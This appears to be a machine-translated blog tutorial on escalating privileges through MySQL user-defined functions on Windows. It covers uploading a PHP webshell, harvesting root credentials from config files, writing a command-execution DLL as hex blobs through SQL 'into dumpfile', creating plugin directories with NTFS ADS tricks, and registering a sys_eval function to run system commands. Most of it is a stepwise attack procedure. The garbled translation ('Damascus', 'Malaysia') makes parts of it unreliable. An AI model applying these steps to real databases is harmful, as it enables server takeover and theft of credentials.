Catalog

  Incidental ：

One 、 Basic knowledge of ：

DLL：

UDF

Ideas ：

Premise ：

Two 、 Use process ：

First step ： Upload Malaysia , View version , Read configuration file root Account password

The second step ： check secure_file_priv value , And change （my.ini Under the table of contents ）

The third step ： View the system framework and plugin Catalog

Step four ： Use Damascus Export dll Document rights

Step five ： Write... Manually dll file

Method 1 ：

Method 2 ：

Step six ：（ direct ） Damascus write DLL file

  Incidental ：

【PHP Malaysia 】 Definition 、 download 、 Use 、 Source code https://blog.csdn.net/qq_53079406/article/details/125084768?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165875214216781818749550%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165875214216781818749550&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125084768-null-null.185^v2^control&utm_term=%E5%A4%A7%E9%A9%AC&spm=1018.2226.3001.4450

One 、 Basic knowledge of ：

DLL：

stay windows There is a thing called dynamic link library , Be commonly called DLL. This file will compile the functions used in the program code into machine code , Save in DLL In file ;

Compile time ,EXE Where is the function called by the execution file DLL In file , When executed, it will automatically start from DLL Call the specified function in the file

---

UDF

user defined function（ User defined functions ）

udf stay mysql5.1 In later versions , Exist in ’mysql/lib/plugin’ Under the table of contents , The file suffix is '.dll'

Ideas ：

By adding new functions , Yes MYSQL Expand the functions of

1、 Will contain cmd Functional DLL Write the file to the specified folder

2、 be based on DLL File to create custom functions

3、 Call the corresponding function based on the custom function , Pass in the parameter , Execute system commands ( The command execution authority is system)

Premise ：

1、MYSQL The version is greater than 5.1：DLL The file must be placed in MYSQL Install under directory lib\plugin Under the table of contents

2、MYSQL Version less than 5.1 Greater than 5.0： stay Windows2003 Next DLL The file is placed in C:\windows\system32; stay windows2000 Next DLL The file is placed in C:\winnt\system32

3、MYSQL Version less than 5.0：DLL Files can be placed at will MYSQL Database users have permission to create and delete functions DLL The file has permission to write to the specified directory

---

stay MySQL In higher version secure-file-priv Parameters limit MySQL Export of
1、NULL, It is forbidden to
2、value The value has a folder Directory , It means that only files in this directory are allowed （ Not even subdirectories ）
2、 If it is empty ( No value ), It means that there is no restriction on the directory
MySQL5.0/5.6 edition ：my.ini This parameter does not exist in , Value is empty , No restrictions on directories
MySQL5.7 edition ：my.ini There are parameters in , The value is NULL, Export... Is not allowed

Two 、 Use process ：

First step ： Upload Malaysia , View version , Read configuration file root Account password

Check the database configuration text in the website source code

(conn.php,config.php,dbconfig.php,config.inc.php,common.inc.php,inc,conn,config.sql,common,data,sql,data,inc,config,conn,database,common,include）

The second step ： check secure_file_priv value , And change （my.ini Under the table of contents ）

show global variables like 'secure%';

Or look directly in the folder

secure_file_priv Value	Express
NULL,	Import forbidden | export
value The value has a folder Directory	Only files in this directory are allowed （ Not even subdirectories ） Import | export
It's empty ( No value )	Do not restrict directory import | export

The third step ： View the system framework and plugin Catalog

show variables like '%compile%';

# View the host version and architecture

show variables like 'plugin%';

# see plugin Catalog

select @@plugin_dir;

If the load fails, try to delete the original extension ：delete from mysql.func where name='cmdshell';

Step four ： Use Damascus Export dll Document rights

export udf, If the script cannot be exported udf file , You can also manually copy the file to plugin Under the folder

（ establish plugin Catalog 、 Copy and paste udf Files need certain permissions )

Step five ： Write... Manually dll file

Method 1 ：

MYSQL Greater than 5.1 Under the circumstances , It may not exist by default plugin Catalog （ utilize NTFS ADS Stream creation plugin Catalog ）

create table temp(data longblob);

---

insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);

---

update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);

---

When MySQL Greater than 5.1 when , The default is No lib\plugin  The directory

and  into dumpfile You cannot create a folder while writing files , So it's wrong ：Can't create/write

select data from temp into dumpfile "D:\\BaiduNetdiskDownload\\phpstudy\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll";

---

Create a custom function sys_eval

create function sys_eval returns string soname 'udf.dll';

---

Method 2 ：

1、 lookup MYSQL Catalog

select @@basedir;

2、 establish lib Catalog

select 'It is dll' into dumpfile 'MYSQL Catalog \\lib::$INDEX_ALLOCATION';

3、 establish plugin Catalog

select 'It is dll' into dumpfile 'MYSQL Catalog \\lib\\plugin::$INDEX_ALLOCATION';

---

The result I got was ：Can't create/write

Step six ：（ direct ） Damascus write DLL file

Premise ：

Export first DLL, Then execute the order .MYSQL User must be root jurisdiction , The export path must be able to load DLL file